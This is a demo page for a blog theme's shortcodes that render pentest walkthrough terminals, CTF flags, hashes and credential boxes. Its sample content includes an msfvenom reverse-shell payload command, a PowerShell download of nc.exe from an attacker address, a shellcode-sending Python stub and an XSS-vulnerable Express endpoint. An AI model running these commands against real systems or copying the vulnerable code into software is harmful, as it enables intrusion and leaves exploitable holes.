Terminal Shortcodes Demo

This post demonstrates all the custom terminal shortcodes available for creating MacOS-style terminal blocks in your posts.

Attacker Terminal (Orange Header)

Use the attacker shortcode for commands run from your attacking machine. This terminal has an orange header and is perfect for pentesting commands.

Regular user ($):

kali

kali:~$ nmap -sC -sV -oA scan 10.10.10.237

Root user (#):

root@kali

root@kali:/opt/tools# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o payload.exe

Target Terminal (Blue Header)

Use the target shortcode for commands run on the target/victim machine. This terminal has a blue header to distinguish it from attacker commands.

Regular user ($):

www-data

www-data:/var/www/html$ ls -la

Root user (#):

root

root:/root# cat /root/flag.txt

Shell Terminal (Generic)

Use the shell shortcode for generic shell commands. This has a lighter MacOS-style header. You can customize the title to describe the output.

Regular user ($):

Shell

$ echo "Hello World"

With custom title:

Checking Network Connection

$ ping -c 4 8.8.8.8

Root user (#):

Restarting Apache Service

# systemctl restart apache2

PowerShell Terminal (Windows)

Use the powershell shortcode for Windows PowerShell commands:

Windows PowerShell

PS C:\\Users\\Administrator> Get-Process | Where-Object {$_.CPU -gt 100}

Windows PowerShell

PS C:\\Windows\\Temp> Invoke-WebRequest -Uri http://10.10.14.5/nc.exe -OutFile nc.exe

CMD Terminal (Windows Command Prompt)

Use the cmd shortcode for Windows Command Prompt:

Command Prompt

C:\\Windows\\System32> dir /a

Command Prompt

C:\\inetpub\\wwwroot> type web.config

SQL Terminal (Database)

Use the sql shortcode for SQL database queries. This terminal has an orange header and supports custom database names and types.

Basic MySQL query:

MySQL Terminal

mysql> SELECT * FROM users WHERE admin=1;

With database name:

MySQL - webapp_db

mysql> SHOW TABLES;

PostgreSQL:

PostgreSQL - production

postgres=# \dt

MSSQL:

MSSQL - master

1> SELECT name FROM sys.databases;

Collapsible Output

Use the output shortcode for long command outputs. It’s collapsible to keep your posts clean. Notice the dashed border, italic title with arrow, and “Collapsible Output” label.

Nmap Scan Results

Collapsible Output

Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-11 10:00 EDT
Nmap scan report for 10.10.10.237
Host is up (0.045s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open  msrpc        Microsoft Windows RPC
443/tcp open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open  microsoft-ds Windows 10 Pro 19042 microsoft-ds

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.23 seconds

Directory Listing

Collapsible Output

total 48
drwxr-xr-x  5 www-data www-data 4096 Mar 11 10:00 .
drwxr-xr-x 12 root     root     4096 Jan 15 08:30 ..
-rw-r--r--  1 www-data www-data  220 Jan 15 08:30 .bash_logout
-rw-r--r--  1 www-data www-data 3526 Jan 15 08:30 .bashrc
drwxr-xr-x  3 www-data www-data 4096 Jan 15 08:45 .cache
-rw-r--r--  1 www-data www-data  807 Jan 15 08:30 .profile
drwxr-xr-x  2 www-data www-data 4096 Mar 11 09:45 uploads
-rw-r--r--  1 www-data www-data 1337 Mar 11 10:00 index.php

Multiple collapsible outputs work independently:

SQL Query Result #1

Collapsible Output

+----+----------+------------------+-------+
| id | username | email            | admin |
+----+----------+------------------+-------+
|  1 | admin    | admin@site.local |     1 |
|  5 | dbuser   | db@site.local    |     1 |
+----+----------+------------------+-------+
2 rows in set (0.00 sec)

SQL Query Result #2

Collapsible Output

+----+---------+-------------------+-------+
| id | user    | email             | role  |
+----+---------+-------------------+-------+
| 12 | test    | test@example.com  | user  |
| 13 | demo    | demo@example.com  | user  |
+----+---------+-------------------+-------+
2 rows in set (0.01 sec)

Security Shortcodes

CTF Flags

The flag shortcode supports different platforms and automatically styles user/root flags:

HackTheBox User Flag:

USER FLAG HTB

HTB{us3r_fl4g_3x4mpl3_h3r3}

HackTheBox Root Flag:

ROOT FLAG HTB

HTB{r00t_fl4g_3x4mpl3_h3r3}

OffSec OSCP Flag:

OSCP Local Flag OFFSEC

OS{0ff53c_l0c4l_pr00f}

TryHackMe Flag:

THM Flag THM

THM{try_h4ck_m3_fl4g}

Hashes

Use the hash shortcode to display password hashes with copy functionality:

MD5 Admin Password Hash

5f4dcc3b5aa765d61d8327deb882cf99

NTLM Windows Administrator Hash

8846f7eaee8fb117ad06bdd830b7586c

SHA256

5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8

Credentials

The credentials shortcode displays found credentials in a secure, organized format:

🔐 SSH

Username: admin

Password: P@ssw0rd123

Host: 10.10.10.237

Port: 22

Notes: Found in /var/www/config.php during enumeration

🔐 MySQL

Username: dbuser

Password: MySQLR0cks!

Host: localhost

Port: 3306

🔐 Web Portal

Username: administrator

Password: Welcome123!

URL: https://admin.example.com/login

Notes: Admin panel credentials discovered through OSINT

Screenshots with Captions

Use the figure shortcode for screenshots with professional captions:

Shortcode Usage Reference

Attacker Terminal

{{< attacker prompt="kali" pwd="~" root="false" >}}
your command here
{{< /attacker >}}

Parameters:

prompt: Username (default: “kali@attacker”)
pwd: Current working directory (default: “~”)
root: Set to “true” for # prompt (default: “false”)

Target Terminal

{{< target prompt="www-data" pwd="/var/www" root="false" >}}
your command here
{{< /target >}}

Parameters:

prompt: Username (default: “victim@target”)
pwd: Current working directory (default: “~”)
root: Set to “true” for # prompt (default: “false”)

Shell Terminal

{{< shell root="false" >}}
your command here
{{< /shell >}}

Parameters:

title: Custom title for the terminal (default: “Shell”)
prompt: Custom prompt character (default: “$”)
root: Set to “true” for # prompt (default: “false”)

PowerShell Terminal

{{< powershell user="Administrator" path="C:\\Users\\Administrator" >}}
your command here
{{< /powershell >}}

Parameters:

user: Username (default: “Administrator”)
path: Current path (default: “C:\Users\Administrator”)

CMD Terminal

{{< cmd user="Administrator" path="C:\\Windows\\System32" >}}
your command here
{{< /cmd >}}

Parameters:

user: Username (default: “Administrator”)
path: Current path (default: “C:\Users\Administrator”)

SQL Terminal

{{< sql prompt="mysql>" database="mydb" type="MySQL" >}}
your query here
{{< /sql >}}

Parameters:

prompt: Database prompt (default: “mysql>”)
database: Database name to display in title
type: Database type (default: “MySQL”) - e.g., “PostgreSQL”, “MSSQL”, “SQLite”
title: Custom title (overrides database/type auto-title)

Collapsible Output

{{< output title="Command Output" collapsed="true" >}}
your output here
{{< /output >}}

Parameters:

title: Header title (default: “Command Output”)
collapsed: Initial state, “true” or “false” (default: “true”)
id: Unique identifier (auto-generated if not provided)

Syntax Highlighting Examples

Here are some examples showing the Dracula syntax highlighting theme in action:

Python Example

def exploit_vulnerability(target_ip, port=443):
    """Connect to target and exploit buffer overflow"""
    payload = b"\x90" * 100  # NOP sled
    shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68"

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, port))
        sock.send(payload + shellcode)
        return True
    except Exception as e:
        print(f"Error: {e}")
        return False

JavaScript/Node.js Example

const express = require('express');
const app = express();

// Vulnerable endpoint - DO NOT USE IN PRODUCTION
app.get('/search', (req, res) => {
    const query = req.query.q;  // XSS vulnerability!
    res.send(`<h1>Results for: ${query}</h1>`);
});

app.listen(3000, () => {
    console.log('Server running on port 3000');
});

Bash Script Example

#!/bin/bash
# Enumeration script for penetration testing

TARGET="10.10.10.1"
PORTS="80,443,8080"

echo "[+] Starting enumeration of $TARGET"
nmap -sC -sV -p $PORTS $TARGET -oN scan.txt

if [ $? -eq 0 ]; then
    echo "[+] Scan completed successfully"
    cat scan.txt | grep "open"
else
    echo "[-] Scan failed"
    exit 1
fi

Features

Terminal Blocks:

MacOS-Style Design: Authentic terminal window appearance with colored buttons
Multiple Terminal Types: Attacker (orange), Target (blue), Shell, PowerShell, CMD, SQL
Color-Coded Headers: Each terminal type has a distinct header color for easy identification
Root User Support: Use root="true" to show # instead of $ for privileged commands
Collapsible Output: Click the header to expand/collapse long outputs, with dashed border and label

Security Shortcodes:

Platform-Aware Flags: HTB (blue), OffSec (orange), TryHackMe (blue), CTF (orange)
User/Root Flags: Automatic icons (👤/👑) and titles for user and root flags
Hash Display: Blue boxes for password hash display
Credentials Box: Blue boxes for credentials with support for SSH, database, and web login details
Figure with Caption: Professional screenshot display with titles and captions

Universal:

Responsive: Works on mobile devices
Dark Mode Support: Adapts to site theme
Security: XSS protection via proper HTML escaping
Clean Design: No copy buttons - focus on content presentation

Enjoy using these blocks in your walkthroughs and tutorials!